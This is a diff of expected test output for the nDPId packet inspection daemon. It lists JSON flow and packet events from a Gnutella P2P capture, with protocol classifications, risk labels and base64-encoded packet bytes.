-00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":160009,"flow_last_seen":163034,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":95923,"flow_last_seen":139892,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.250.179.237","src_port":28681,"dst_port":20848,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":139506,"flow_last_seen":177166,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1954,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"63.228.175.169","src_port":28681,"dst_port":1936,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":95216,"flow_last_seen":162802,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00794{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":160009,"flow_last_seen":163034,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":51685,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5304,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90004,"flow_last_seen":163118,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":343454,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.140.120.41","src_port":28681,"dst_port":47739,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":3,"flow_last_seen":350801,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":350801,"pkt":"UlQAEjUCCAAn5uVZCABFAABUUWcAAIARlZ8KAAIPVEfzPHAJhsIAQN+fXS\/iNTECAGQaxPLpTglwD4ABACEAAAD5AHBpbmtmbG95ZADDAlFLRO45aqEDU0NQQAFaQIJQUkA="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":350982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":350982,"pkt":"UlQAEjUCCAAn5uVZCABFAAA49UMAAIARRGEKAAIPR++tEnAJWx8AJJ\/UjSsxAo9FSZH\/5RaddLKjAwABAAUAAADDglFLQA=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5386,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":351110,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":351110,"pkt":"CAAn5uVZUlQAEjUCCABFAABKDVAAAEARbENH760SCgACD1sfcAkANlLBjSsxAo9FSZH\/5RaddLKjAwEBABcAAAAfW0fvrRIAAAAACAAAAMOCUUtEmW5VTg=="} 
-00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":139506,"flow_last_seen":168554,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.118.53.212","src_port":28681,"dst_port":29998,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":101122,"flow_last_seen":168840,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2737,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":168555,"flow_last_seen":287464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2374,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":28681,"dst_port":9915,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168840,"flow_last_seen":174342,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":38297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":168594,"flow_last_seen":176963,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1959,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.192.210.182","src_port":28681,"dst_port":6754,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5408,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":168428,"flow_last_seen":174303,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":353404,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"198.58.218.12","src_port":28681,"dst_port":47912,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":355387,"flow_last_seen":355387,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":355387,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.125.218.84","src_port":28681,"dst_port":17561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":355387,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":355387,"pkt":"UlQAEjUCCAAn5uVZCABFAABDeM0AAIARhvwKAAIPVH3aVHAJRJkAL52kWv4xAksIMkL\/WuRk66hXAwABABAAAADDA1NDUEECglZDRUdUS0di"} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00793{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"94.8.55.158","src_port":28681,"dst_port":51140,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":174322,"flow_last_seen":174322,"flow_idle_time":200000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.23.24.213","src_port":28681,"dst_port":18561,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":95443,"flow_last_seen":176562,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":363239,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 